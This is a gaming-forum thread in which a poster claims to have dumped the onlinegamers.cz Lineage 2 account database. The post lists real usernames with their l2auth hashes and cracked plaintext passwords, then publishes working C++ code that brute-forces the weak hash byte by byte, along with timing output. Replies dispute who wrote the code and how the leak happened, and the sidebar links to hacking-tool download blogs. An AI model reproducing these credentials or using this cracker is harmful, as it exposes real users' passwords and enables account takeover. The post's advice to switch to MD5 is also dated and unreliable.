Jump to content

Recommended Posts

Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely), small example:

 

yurii2 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii3 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

yurii4 : 0x452EE4C0714EC7EBCE88B31ED3496F6F : yurii12345

Yuriik : 0xC9D81E75C8EDBE4075ECCACA079DBBBB : vanecka

Yurii : 0xC9D81E75C8EDBE4075ECCACA079DBBBB  vanecka

yurikhan : 0xB539DD269BFD93BE8B123434F9634545 : peter7Y0

yuriko : 0x357A6689B817C47742DBFDFD30AA8C8C : 081p87

Yuri Prime : 0xA52FDE10AD94E98EBB220404C9537575 : litaon

Yuris : 0xA9A0BA5EE764ADA108318127EA705656 : fatimapP13

Yury : 0x25689971CCB29ACDF86147478A103636 : madcji

Yuske : 0xB5B1EDD4696C10A499228B8A47DDFBFB : dfabsf7hw

yusuf : 0x35C266BA03B8D0862FEADAA06DF7D1D1 : AbCbmfKA19N

yusuke : 0xA507789726A97ABBAA748D60AD371111 : lucayd3<eii

 

It's easy cause that hash is CRAP and has looooooooot of collisions...

 

./crack

0xC9D81E75C8EDBE4075ECCACA079DBBBB

vanecka (0xC9D81E75C8EDBE4075ECCACA079DBBBB)

0xC9D81E75C8EDBE4075ECCACA079DBBBB vanecka (took 0 seconds)

0xB539DD269BFD93BE8B123434F9634545

peter7Y0 (0xB539DD269BFD93BE8B123434F9634545)

0xB539DD269BFD93BE8B123434F9634545 peter7Y0 (took 3 seconds)

0x35C266BA03B8D0862FEADAA06DF7D1D1

AbCbmfKA19N (0x35C266BA03B8D0862FEADAA06DF7D1D1)

0x35C266BA03B8D0862FEADAA06DF7D1D1 AbCbmfKA19N (took 3 seconds)

 

 

What do you say to those times? :)

 

 

And it's really easy:

 

#include <map>
#include <fstream>
#include <vector>
#include <iostream>
#include <string>
#include <math.h>
#include <string.h>

std::string encrypt(const std::string &plain)
{
    const static double arrayMul[4] = {213119, 213247, 213203, 213821};
    const static double arrayAdd[4] = {2529077, 2529089, 2529589, 2529997};
    unsigned char dst[16];
    unsigned char key[16];
    memset(dst, 0, 16);
    memset(key, 0, 16);
    double val[4];
    memset(val, 0, sizeof(float)*4);

    for (size_t i(0) ; i < 16 ; ++i) {
        if (plain.size() > i) {
            dst[i] = static_cast<unsigned char>(plain[i]);
            key[i] = static_cast<unsigned char>(plain[i]);
        } else {
            dst[i] = 0;
            key[i] = 0;
        }
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        double x(key[i*4]);
        x += key[i*4+1] << 8;
        x += key[i*4+2] << 16;
        x += key[i*4+3] << 24;
        x *= arrayMul[i];
        x += arrayAdd[i];
        val[i] = fmod(x, 4294967296.0);
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        key[i*4+0] = static_cast<uint32_t>(val[i]) & 0xff;
        key[i*4+1] = static_cast<uint32_t>(val[i] / 0x100) & 0xff;
        key[i*4+2] = static_cast<uint32_t>(val[i] / 0x10000) & 0xff;
        key[i*4+3] = static_cast<uint32_t>(val[i] / 0x1000000) & 0xff;
    }

    dst[0] ^= key[0];
    for (size_t i(1) ; i < 16 ; ++i) {
        dst[i] = dst[i] ^ dst[i-1] ^ key[i];
    }

    for (size_t i(0) ; i < 16 ; ++i) {
        if (!dst[i]) {
            dst[i] = 0x66;
        }
    }

    std::string result("0x");
    for (size_t i(0) ; i < 16 ; ++i) {
        char x[3];
        sprintf(x, "%02X", dst[i]);
        result += x;
    }

    return result;
}

std::string tryPassword(const std::string &hash,
                        const std::string &chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
                        const std::string &possibility = std::string())
{
    std::string result;
    size_t j(possibility.size());
    for (size_t i(0) ; i < chars.size() ; ++i) {
        std::string s(possibility);
        s.push_back(chars[i]);
        std::string enc(encrypt(s));
        // std::cerr << "Trying " << s << std::endl; // comment out to see what we're trying
        if (enc.substr(0, 2+j*2) == hash.substr(0, 2+j*2)) {
            if (enc == hash) {
                std::cerr << s << " (" << enc << ")" << std::endl;
                return s; // comment out to write out all possible passwords xD
            }
            std::string res(tryPassword(hash, chars, s));
            if (!res.empty()) {
                return res;
            }
        }
    }
    return "";
}

int main(int argc, char **argv)
{
    std::map<std::string, std::string> crackMap;
    std::istream *ifs;
    if (argc != 1) {
        ifs = new std::ifstream(argv[1]);
    } else {
        ifs = &std::cin;
    }

    for (;;) {
        if (ifs->eof()) {
            break;
        }

        std::string line;
        getline(*ifs, line);
        if (line.size() == 34) {
            std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(line));
            if (icrackMap != crackMap.end()) {
                std::cout << line << " " << icrackMap->second << " (from cache)" << std::endl;
                continue;
            }
            time_t t(time(0));
            std::string password(tryPassword(line));
            if (!password.empty()) {
                crackMap.insert(std::make_pair(line, password));
                int seconds(time(0) - t);
                if (seconds < 60) {
                    std::cout << line << " " << password << " (took " << seconds << " seconds)" << std::endl;
                } else if (seconds % 60) {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes and " << (seconds % 60) << " seconds)" << std::endl;
                } else {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes" << std::endl;
                }
            }
        } else {
            size_t offset(line.find(":"));
            if (offset != std::string::npos) {
                std::string hash(line.substr(offset+1));
                std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(hash));
                if (icrackMap != crackMap.end()) {
                    std::cout << line.substr(0, offset) << ":" << icrackMap->second << std::endl;
                    continue;
                }
                std::string password(tryPassword(hash));
                crackMap.insert(std::make_pair(hash, password));
                if (!password.empty()) {
                    std::cout << line.substr(0, offset) << ":" << password << std::endl;
                }
            } else if (!line.empty()) {
                std::cout << line << " " << encrypt(line) << std::endl;
            }
        }
    }

    return 0;
}

So we advise everybody out there using l2auth to switch to MD5 (there are some files needed on postpacific.com)

 

 

Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to setup mssql securely)

 

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

 

Trust me, that ist not copy/past... i developed it by myself...

 

The code is generic for all PTS login servers with small changes.

So SnoopedMan is cheater on forum, not in game.

Posted

So you think that everyone was able to crack those hashes? Generic code is only the function std::string encrypt(const std::string &plain).. The rest is my code and it was released just here and on EPVP, but they've deleted it there.

Posted

Function std::string encrypt(const std::string &plain) is from PTS.

Rest is my code.

 

You know "magic numbers" in encoder, so you knows magic numbers in decoder, like: substr(0, 2+j*2)...

 

It is mistery? What if you don't know magic numbers in encoder?

Anything universal for C4 or others?

 

QQ Not your code.

Posted

Good job ! Hackers are getting better and better everyday while the developers can't even think why this happends! ^^

 

Lol, if we dont get worst, were bound to get much better!

 

Good post, your on your way buddy.

Posted

 

OMG

You need encoder to check whether hash you generated starts with right chars.. that hash is crap, cause you can go char-by-char and check just the first 1 byte, first 2 bytes, first 3 bytes, ...

It's really not a cryptographic hash...

 

And substr(0, 2+j*2) means substring of that hash, 2+ because it starts with "0x", that we ignore and j*2 because that hash is encoded in hex to be human-readable...

 

Try to comprehend my code and then write your stupid posts xD

Posted

It was easy to dump database because admin (poker10) dumped it by yourself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data are from old database, even data do not match.

Well, it's a little bit more complicated than it is usually presented by people.

First of all, poker10 wasn't fired. Nearly everyone from the "old" Lineage 2 team left at the end of November 08 after several disagreements with Rod, OG president in that time. Some of us (including me and poker10) stayed and helped to keep the game environment running for several weeks, but we were no longer members of the team. We, unluckily, also tried to give the new team some "advices", as they were quite new on their positions, but as both sides were a little bit stubborn, it only led to other disagreements. As poker10 was more offensive for the taste of new team, the major "blame" was laid on his head. And, thanks to "slightly inadequate" behaviour of martinus and some other members, the legend of "poker10 fired from OG" was born.

 

Hope this helps the legend to die.

 

Best regards,

Jan "Pandas" Smitka

Onlinegamers.cz, o.s. Lineage 2 ex-head-admin

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • aCis (“another Crappy interlude server”) is a commercial project I would not use even if paid. l2jfrozen yes, a 10 year old, effectively dead project produces more reliable results and at least works. l2jhellas also works. aCis might as well be renamed KPMIS (“Keep Paying My Interlude Server”): endless fixes, freemium, and no realistic path to true L2OFF parity, but its recommended like hell. lucera is even better the downside is you just need to dive into code and no sources   lets leave it at that
    • Download Here: https://sitehunterus.blogspot.com/2025/12/exelo-combo-tool-v2.html VirusTotal https://www.virustotal.com/gui/file/2acd067847ee092c7986f55c9f77620d89505d1c0bda34a0ee8f55b9c2905c11?nocache=1 Visit my Blogger list to download 100% free software https://www.freetoolss.com/ https://blackhat8.blogspot.com/ https://hack-crack9.blogspot.com/ https://hackernoons.blogspot.com/ https://sharetools99.blogspot.com/
    • Care to detail why ?   L2JHellas probably got the same issue, it's inherent to L2J if you don't rework Player intentions (and solving it with a Config < 500 attack is stupid, if it works for attack it works for other types of desires), also last time I checked L2JHellas he was using my changesets to fix its own stuff (which is ok, copy-paste my knownlist system which is 10y old is fine, but don't say it will act different since it's literally the same sub-system).   About Lucera code source isn't available so it's easy to say it's better, internally you got no clue what is happening and RU forks got the "feeling" to get everything, but everything is half done, everytime I put an eye on such sources (whatever based on l2ru, they only know how to copy-paste each other).   In the other hand, you seem to use aCis since years (I think I see your name since a decade, and you still use it since you made this topic :   Be a little more appreciative about the work done, it's not only mine but my community aswell, and if you find something, consider to report rather than getting such an idiotic behavior.   I understand you're not forced to share any type of fixes, and than people tend to feel superior when they fix something than aCis didn't yet fix. The thing is, for each bug you found, I found and fixed 10x more than you.   409 is way beyond 382 in all possible ways, if you believe the versus good for you, but don't make ppl believe it's the case, because it's not. There's at least 400+ fixed issues (and that's counting 10 issues by revision, which is kinda low) and entire new systems (spawns, SCHs, pathfind, whole AI implemented, Desire system,...).
    • better than using 409... Search for L2jHellas or Lucera and you won't have any headaches.
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock